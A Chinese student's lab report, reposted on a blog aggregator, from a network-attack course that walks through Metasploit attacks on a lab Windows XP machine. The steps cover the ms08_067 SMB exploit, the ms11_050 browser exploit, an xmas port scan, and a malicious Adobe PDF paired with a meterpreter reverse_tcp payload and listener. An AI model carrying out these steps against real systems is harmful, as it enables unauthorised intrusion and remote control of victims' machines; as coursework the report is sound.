博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
20145240《网络对抗》MSF基础应用
阅读量:6503 次
发布时间:2019-06-24

本文共 1251 字,大约阅读时间需要 4 分钟。

MSF基础应用

一个主动攻击,如ms08_067

  • 启动msf

  • search ms08_067,查找相应的漏洞,查询可攻击的模块。

889914-20170413164258033-542626289.png

  • 根据上述漏洞的模块use exploit/windows/smb/ms08_067_netapi选择该模块

  • 接下来查看相应的攻击载荷,首先我们可以查看可使用的载荷

889914-20170413165049517-39689574.png

  • 想要获取靶机的shell,所以可以选择以上攻击载荷

  • 先查看 options 发现需要设置的信息

889914-20170413192712064-1701596835.png

  • 设置攻击主机ip(LHOST)、远程主机ip(RHOST)以及设置相应平台的编号:set target 0

889914-20170413192839423-473422729.png

  • 发起渗透攻击,exploit,成功

889914-20170413194702876-743789174.png

一个针对浏览器的攻击,如ms11_050

  • 查找相关漏洞信息

889914-20170413213516548-1912770426.png

  • 找到模块后,可以通过info指令查看模块详细信息

889914-20170413214318298-1655126422.png

  • 设置如下信息

889914-20170413220050767-1054126982.png

  • 在浏览器输入以下信息

889914-20170413220637923-967598469.png

  • 回头看 发现试了很多次

889914-20170413220830095-612552126.png

成功应用任何一个辅助模块——xmas

  • 一种更为隐蔽的扫描方式,通过发送FIN,PSH,URG标志能够躲避一些TCP标记检测器的过滤。

  • 端口扫描分为TCP SYN、TCP connect、秘密扫描、以及其他扫描,xmas属于端口扫描中的秘密扫描的一种。

  • 先查看需要设置的信息

889914-20170414152305314-770948341.png

  • 设置端口及RHOST,限制了端口1—100

889914-20170414153043033-1850453148.png

  • run发现,open | filtered 无法确定端受限口是开放还是被防火墙设置成被过滤, 可能开放的端口不响应。

889914-20170414153226408-1288015947.png

  • XMAS扫描原理和NULL扫描的类似,将TCP数据包中的ACK、FIN、RST、SYN、URG、PSH标志位置1后发送给目标主机。在目标端口开放的情况下,目标主机将不返回任何信息。

一个针对客户端的攻击,如Adobe

  • 首先设置显示隐藏文件夹

  • 输入命令use exploit/windows/fileformat/adobe_cooltype_sing,进入该漏洞模块的使用。

  • 使用命令set payload windows/meterpreter/reverse_tcp设置攻击有效载荷。

889914-20170414154958533-426613558.png

  • 设置 FILENAME 、LPORT、LHOST

889914-20170414155258798-1228043487.png

  • 输入exploit,生成pdf文件,并可以看到pdf所在文件夹,将pdf复制到靶机里。

889914-20170414155446017-1154912844.png

  • 使用命令back退出当前模块,并使用use exploit/multi/handler新建一个监听模块。设置相同的端口如上。

889914-20170414160123861-932296338.png

  • 使用命令exploit开始攻击,在xp中打开pdf。

889914-20170414160418892-158875763.png

  • 成功。第一次由于超时未响应,所以失败了。第二次就OK了。

889914-20170414161140845-1248460089.png

  • 可在靶机中查看链接,发现连接信息。

889914-20170414161202064-1591276005.png

实验后回答问题

  • 什么是exploit?

exploit就是背着payload去攻击,起到运载作用

  • 什么是payload?

payload则为攻击负荷

  • 什么是encode?

encode为编码器,使其得到伪装,防止被查杀,打掩护用到的。

实验总结与体会

老师我发誓我写了。。写着写着熄灯了,我还拍照留了证据当时。。因为我怕没保存上。。咋可能不写啊!!!

转载于:https://www.cnblogs.com/20145240lsj/p/6701563.html

你可能感兴趣的文章
luogu P1280 尼克的任务 序列DP
查看>>
iphone UIView的一些基本方法理解
查看>>
sys.check_constraints
查看>>
vue问题
查看>>
ThinkPHP 框架学习
查看>>
css3箭头效果
查看>>
MathType在手,公式不求人!
查看>>
测试用例设计
查看>>
三层架构
查看>>
Python变量类型(l整型,长整形,浮点型,复数,列表,元组,字典)学习
查看>>
解决方案(.sln)文件
查看>>
【Treap】bzoj1588-HNOI2002营业额统计
查看>>
第六周作业
查看>>
利用ZYNQ SOC快速打开算法验证通路(5)——system generator算法IP导入IP integrator
查看>>
指针和引用的区别
查看>>
运行PHP出现No input file specified错误解决办法
查看>>
【重建】从FJOI2016一试谈起
查看>>
selenium之frame操作
查看>>
php 引入其他文件中的变量
查看>>
MYSQL体系结构-来自期刊
查看>>